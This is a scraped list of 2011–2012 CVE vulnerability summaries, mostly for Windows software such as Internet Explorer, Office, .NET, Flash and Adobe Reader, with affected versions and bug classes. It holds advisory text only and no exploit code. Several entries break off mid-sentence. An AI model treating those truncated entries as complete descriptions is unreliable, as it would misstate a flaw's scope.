Works 9, and Works 6-9 File Converter allows remote attackers to execute arbitrary code via a crafted Works (aka .wps) file, aka "Office WPS Converter Heap Overflow Vulnerability." [CVE-2012-0172] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "VML Style Remote Code Execution Vulnerability." [CVE-2012-0171] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "SelectAll Remote Code Execution Vulnerability." [CVE-2012-0170] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnReadyStateChange Remote Code Execution Vulnerability." [CVE-2012-0169] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "JScript9 Remote Code Execution Vulnerability." [CVE-2012-0168] Microsoft Internet Explorer 6 through 9 allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document that is not properly handled during a "Print table of links" print operation, aka "Print Feature Remote Code Execution Vulnerability." [CVE-2012-0167] Heap-based buffer overflow in the Office GDI+ library in Microsoft Office 2003 SP3 and 2007 SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted EMF image in an Office document, aka "GDI+ Heap Overflow Vulnerability." [CVE-2012-0163] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate function parameters, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Parameter Validation Vulnerability." [CVE-2012-0162] Microsoft .NET Framework 4 does not properly allocate buffers, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Buffer Allocation Vulnerability." [CVE-2012-0161] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly handle an unspecified exception during use of partially trusted assemblies to serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0160] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5 SP1, 3.5.1, and 4 does not properly serialize input data, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Serialization Vulnerability." [CVE-2012-0158] The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0155] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "VML Remote Code Execution Vulnerability." [CVE-2012-0147] Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 does not properly configure the default web site, which allows remote attackers to obtain sensitive information via a crafted HTTPS request, aka "Unfiltered Access to UAG Default Website Vulnerability." [CVE-2012-0146] Open redirect vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "UAG Blind HTTP Redirect Vulnerability." [CVE-2012-0145] Cross-site scripting (XSS) vulnerability in wizardlist.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in wizardlist.aspx Vulnerability." [CVE-2012-0144] Cross-site scripting (XSS) vulnerability in themeweb.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in themeweb.aspx Vulnerability." [CVE-2012-0143] Microsoft Excel 2003 SP3 and Office 2008 for Mac do not properly handle memory during the opening of files, which allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel Memory Corruption Using Various Modified Bytes Vulnerability." [CVE-2012-0142] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0141] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-0138] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0137. [CVE-2012-0137] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0136, and CVE-2012-0138. [CVE-2012-0136] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0020, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0105] Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization 4.1 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Windows Guest Additions. [CVE-2012-0020] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0019, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0019] Microsoft Visio Viewer 2010 Gold and SP1 does not properly handle memory during the parsing of files, which allows remote attackers to execute arbitrary code via crafted attributes in a Visio file, aka "VSD File Format Memory Corruption Vulnerability," a different vulnerability than CVE-2012-0020, CVE-2012-0136, CVE-2012-0137, and CVE-2012-0138. [CVE-2012-0018] Microsoft Visio Viewer 2010 Gold and SP1 does not properly validate attributes in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "VSD File Format Memory Corruption Vulnerability." [CVE-2012-0017] Cross-site scripting (XSS) vulnerability in inplview.aspx in Microsoft SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in inplview.aspx Vulnerability." [CVE-2012-0016] Untrusted search path vulnerability in Microsoft Expression Design [CVE-2012-0015] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly calculate the length of an unspecified buffer, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka ".NET Framework Heap Corruption Vulnerability." [CVE-2012-0014] Microsoft .NET Framework 2.0 SP2, 3.5.1, and 4, and Silverlight 4 before 4.1.10111, does not properly restrict access to memory associated with unmanaged objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, (3) a crafted .NET Framework application, or (4) a crafted Silverlight application, aka ".NET Framework Unmanaged Objects Vulnerability." [CVE-2012-0012] Microsoft Internet Explorer 9 does not properly handle the creation and initialization of string objects, which allows remote attackers to read data from arbitrary process-memory locations via a crafted web site, aka "Null Byte Information Disclosure Vulnerability." [CVE-2012-0011] Microsoft Internet Explorer 7 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "HTML Layout Remote Code Execution Vulnerability." [CVE-2012-0010] Microsoft Internet Explorer 6 through 9 does not properly perform copy-and-paste operations, which allows user-assisted remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Copy and Paste Information Disclosure Vulnerability." [CVE-2012-0008] Untrusted search path vulnerability in Microsoft Visual Studio 2008 SP1, 2010, and 2010 SP1 allows local users to gain privileges via a Trojan horse add-in in an unspecified directory, aka "Visual Studio Add-In Vulnerability." [CVE-2012-0007] The Microsoft Anti-Cross Site Scripting (AntiXSS) Library 3.x and 4.0 does not properly evaluate characters after the detection of a Cascading Style Sheets (CSS) escaped character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML input, aka "AntiXSS Library Bypass Vulnerability." [CVE-2011-5127] Directory traversal vulnerability in Blue Coat Reporter 9.x before 9.2.4.13, 9.2.5.x before 9.2.5.1, and 9.3 before 9.3.1.2 on Windows allows remote attackers to read arbitrary files, and consequently execute arbitrary code, via an unspecified HTTP request. [CVE-2011-5049] MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306. [CVE-2011-5012] Heap-based buffer overflow in the Reflection FTP Client (rftpcom.dll 7.2.0.106 and possibly other versions), as used in Attachmate Reflection 2008, Reflection 2011 R1 before 15.3.2.569 and R1 SP1 before, Reflection 2011 R2 before 15.4.1.327, Reflection Windows Client 7.2 SP1 before hotfix 7.2.1186, and Reflection 14.1 SP1 before 14.1.1.206 allows remote FTP servers to execute arbitrary code via a long directory name in a response to a LIST command. [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request. [CVE-2011-4694] Unspecified vulnerability in Adobe Flash Player 11.1.102.55 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted SWF file, as demonstrated by the second of two vulnerabilities exploited by the Intevydis vd_adobe_fp module in VulnDisco Step Ahead (SA). NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4693] Unspecified vulnerability in Adobe Flash Player 11.1.102.55 on Windows and Mac OS X allows remote attackers to execute arbitrary code via a crafted SWF file, as demonstrated by the first of two vulnerabilities exploited by the Intevydis vd_adobe_fp module in VulnDisco Step Ahead (SA). NOTE: as of 20111207, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. [CVE-2011-4689] Microsoft Internet Explorer 6 through 9 does not prevent capture of data about the times of Same Origin Policy violations during IFRAME loading attempts, which makes it easier for remote attackers to determine whether a document exists in the browser cache via crafted JavaScript code. [CVE-2011-4373] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4370 and CVE-2011-4372. [CVE-2011-4372] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4370 and CVE-2011-4373. [CVE-2011-4371] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via unspecified vectors. [CVE-2011-4370] Adobe Reader and Acrobat before 9.5, and 10.x before 10.1.2, on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-4372 and CVE-2011-4373. [CVE-2011-4369] Unspecified vulnerability in the PRC component in Adobe Reader and Acrobat 9.x before 9.4.7 on Windows, Adobe Reader and Acrobat 9.x through 9.4.6 on Mac OS X, Adobe Reader and Acrobat 10.x through 10.1.1 on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. [CVE-2011-4187] Buffer overflow in the GetDriverSettings function in nipplib.dll in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a long realm field, a different vulnerability than CVE-2011-3173. [CVE-2011-4186] Heap-based buffer overflow in nipplib.dll in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a crafted client-file-name parameter in a printer-url, a different vulnerability than CVE-2011-1705. [CVE-2011-4185] The GetPrinterURLList2 method in the ActiveX control in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2008-2431 and CVE-2008-2436. [CVE-2011-3649] Mozilla Firefox 7.0 and Thunderbird 7.0, when the Direct2D (aka D2D) API is used on Windows in conjunction with the Azure graphics back-end, allow remote attackers to bypass the Same Origin Policy, and obtain sensitive image data from a different domain, by inserting this data into a canvas. NOTE: this issue exists because of a CVE-2011-2986 regression. [CVE-2011-3640] DISPUTED Untrusted search path vulnerability in Mozilla Network Security Services (NSS), as used in Google Chrome before 17 on Windows and Mac OS X, might allow local users to gain privileges via a Trojan horse pkcs11.txt file in a top-level directory. NOTE: the vendor's response was "Strange behavior, but we're not treating this as a security bug." [CVE-2011-3516] Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 6 Update 27 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-3417] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0, when sliding expiry is enabled, does not properly handle cached content, which allows remote attackers to obtain access to arbitrary user accounts via a crafted URL, aka "ASP.NET Forms Authentication Ticket Caching Vulnerability." [CVE-2011-3416] The Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote authenticated users to obtain access to arbitrary user accounts via a crafted username, aka "ASP.Net Forms Authentication Bypass Vulnerability." [CVE-2011-3415] Open redirect vulnerability in the Forms Authentication feature in the ASP.NET subsystem in Microsoft .NET Framework 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted return URL, aka "Insecure Redirect in .NET Form Authentication Vulnerability." [CVE-2011-3414] The CaseInsensitiveHashProvider.getHashCode function in the HashTable implementation in the ASP.NET subsystem in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5 SP1, 3.5.1, and 4.0 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka "Collisions in HashTable May Cause DoS Vulnerability." [CVE-2011-3413] Microsoft PowerPoint 2007 SP2 [CVE-2011-3412] Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect memory handling, aka "Publisher Memory Corruption Vulnerability." [CVE-2011-3411] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Invalid Pointer Vulnerability." [CVE-2011-3410] Array index error in Microsoft Publisher 2003 SP3, and 2007 SP2 and SP3, allows remote attackers to execute arbitrary code via a crafted Publisher file that leverages incorrect handling of values in memory, aka "Publisher Out-of-bounds Array Index Vulnerability." [CVE-2011-3404] Microsoft Internet Explorer 6 through 9 does not properly use the Content-Disposition HTTP header to control rendering of the HTTP response body, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Content-Disposition Information Disclosure Vulnerability." [CVE-2011-3403] Microsoft Excel 2003 SP3 and Office 2004 for Mac do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted Excel spreadsheet, aka "Record Memory Corruption Vulnerability." [CVE-2011-3396] Untrusted search path vulnerability in Microsoft PowerPoint 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "PowerPoint Insecure Library Loading Vulnerability." [CVE-2011-3330] Buffer overflow in the UnitelWay Windows Device Driver, as used in Schneider Electric Unity Pro 6 and earlier, OPC Factory Server 3.34, Vijeo Citect 7.20 and earlier, Telemecanique Driver Pack 2.6 and earlier, Monitor Pro 7.6 and earlier, and PL7 Pro 4.5 and earlier, allows local users, and possibly remote attackers, to execute arbitrary code via an unspecified system parameter. [CVE-2011-3310] The Home Page component in Cisco CiscoWorks Common Services before 4.1 on Windows, as used in CiscoWorks LAN Management Solution, Cisco Security Manager, Cisco Unified Service Monitor, Cisco Unified Operations Manager, CiscoWorks QoS Policy Manager, and CiscoWorks Voice Manager, allows remote authenticated users to execute arbitrary commands via a crafted URL, aka Bug IDs CSCtq48990, CSCtq63992, CSCtq64011, CSCtq64019, CSCtr23090, and CSCtt25535. [CVE-2011-3260] Buffer overflow in OfficeImport in Apple iOS before 5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted Microsoft Word document. [CVE-2011-3251] Apple QuickTime before 7.7.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted TKHD atoms in a QuickTime movie file. [CVE-2011-3247] Integer overflow in Apple QuickTime before 7.7.1 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT file. [CVE-2011-3243] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple iOS before 5 and Safari before 5.1.1, allows remote attackers to inject arbitrary web script or HTML via vectors involving inactive DOM windows. [CVE-2011-3185] gtkutils.c in Pidgin before 2.10.0 on Windows allows user-assisted remote attackers to execute arbitrary programs via a file: URL in a message. [CVE-2011-3098] Google Chrome before 19.0.1084.46 on Windows uses an incorrect search path for the Windows Media Player plug-in, which might allow local users to gain privileges via a Trojan horse plug-in in an unspecified directory. [CVE-2011-3072] Google Chrome before 18.0.1025.151 allows remote attackers to bypass the Same Origin Policy via vectors related to pop-up windows. [CVE-2011-2986] Mozilla Firefox 4.x through 5, Thunderbird before 6, SeaMonkey 2.x before 2.3, and possibly other products, when the Direct2D (aka D2D) API is used on Windows, allows remote attackers to bypass the Same Origin Policy, and obtain sensitive image data from a different domain, by inserting this data into a canvas. [CVE-2011-2977] Bugzilla 3.6.x before 3.6.6, 3.7.x, 4.0.x before 4.0.2, and 4.1.x before 4.1.3 on Windows does not delete the temporary files associated with uploaded attachments, which allows local users to obtain sensitive information by reading these files. NOTE: this issue exists because of a regression in 3.6. [CVE-2011-2836] Google Chrome before 14.0.835.163 does not require Infobar interaction before use of the Windows Media Player plug-in, which makes it easier for remote attackers to have an unspecified impact via crafted Flash content. [CVE-2011-2822] Google Chrome before 13.0.782.215 on Windows does not properly parse URLs located on the command line, which has unspecified impact and attack vectors. [CVE-2011-2806] Google Chrome before 13.0.782.215 on Windows does not properly handle vertex data, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-2779] Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 uses world-writable permissions for exported report files, which allows local users to change or delete log data by modifying a file, a different vulnerability than CVE-2011-0770. [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2011-2678] The Cisco VPN Client 5.0.7.0240 and 5.0.7.0290 on 64-bit Windows platforms uses weak permissions (NT AUTHORITY\INTERACTIVE:F) for cvpnd.exe, which allows local users to gain privileges by replacing this executable file with an arbitrary program, aka Bug ID CSCtn50645. NOTE: this vulnerability exists because of a CVE-2007-4415 regression. [CVE-2011-2664] Unspecified vulnerability in Check Point Multi-Domain Management / Provider-1 NGX R65, R70, R71, and R75, and SmartCenter during installation on non-Windows machines, allows local users on the MDS system to overwrite arbitrary files via unknown vectors. [CVE-2011-2618] Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via web script that moves a (1) AUDIO element or (2) VIDEO element between windows. [CVE-2011-2617] Unspecified vulnerability in Opera before 11.50 allows remote attackers to cause a denial of service (application crash) via vectors related to selecting a text node, and closed pop-up windows, removed pop-up windows, and IFRAME elements. [CVE-2011-2604] The Intel G41 driver 6.14.10.5355 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2602] The NVIDIA Geforce 310 driver 6.14.12.7061 on Windows XP SP3 allows remote attackers to cause a denial of service (system crash) via a crafted web page that is visited with Google Chrome or Mozilla Firefox, as demonstrated by the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2600] The GPU support functionality in Windows XP does not properly restrict rendering time, which allows remote attackers to cause a denial of service (system crash) via vectors involving WebGL and (1) shader programs or (2) complex 3D geometry, as demonstrated by using Mozilla Firefox or Google Chrome to visit the lots-of-polys-example.html test page in the Khronos WebGL SDK. [CVE-2011-2598] The WebGL implementation in Mozilla Firefox 4.x allows remote attackers to obtain screenshots of the windows of arbitrary desktop applications via vectors involving an SVG filter, an IFRAME element, and uninitialized data in graphics memory. [CVE-2011-2462] Unspecified vulnerability in the U3D component in Adobe Reader and Acrobat 10.1.1 and earlier on Windows and Mac OS X, and Adobe Reader 9.x through 9.4.6 on UNIX, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, as exploited in the wild in December 2011. [CVE-2011-2460] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, and CVE-2011-2459. [CVE-2011-2459] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, and CVE-2011-2460. [CVE-2011-2458] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, when Internet Explorer is used, allows remote attackers to bypass the cross-domain policy via a crafted web site. [CVE-2011-2457] Stack-based buffer overflow in Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2456] Buffer overflow in Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2455] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2454] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2453] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2452, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2452] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2451, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2451] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2445, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2450] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via unspecified vectors. [CVE-2011-2445] Adobe Flash Player before 10.3.183.11 and 11.x before 11.1.102.55 on Windows, Mac OS X, Linux, and Solaris and before 11.1.102.59 on Android, and Adobe AIR before 3.1.0.4880, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2451, CVE-2011-2452, CVE-2011-2453, CVE-2011-2454, CVE-2011-2455, CVE-2011-2459, and CVE-2011-2460. [CVE-2011-2444] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, related to a "universal cross-site scripting issue," as exploited in the wild in September 2011. [CVE-2011-2430] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via crafted streaming media, related to a "logic error vulnerability." [CVE-2011-2429] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, related to a "security control bypass." [CVE-2011-2428] Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service (browser crash) via unspecified vectors, related to a "logic error issue." [CVE-2011-2427] Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows attackers to execute arbitrary code or cause a denial of service via unspecified vectors. [CVE-2011-2426] Stack-based buffer overflow in the ActionScript Virtual Machine (AVM) component in Adobe Flash Player before 10.3.183.10 on Windows, Mac OS X, Linux, and Solaris, and before 10.3.186.7 on Android, allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2011-2425] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2417. [CVE-2011-2424] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted SWF file, as demonstrated by "about 400 unique crash signatures." [CVE-2011-2417] Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2140, and CVE-2011-2425. [CVE-2011-2416] Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2138. [CVE-2011-2415] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2414. [CVE-2011-2414] Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2415. [CVE-2011-2383] Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue, aka "Drag and Drop Information Disclosure Vulnerability." NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release. 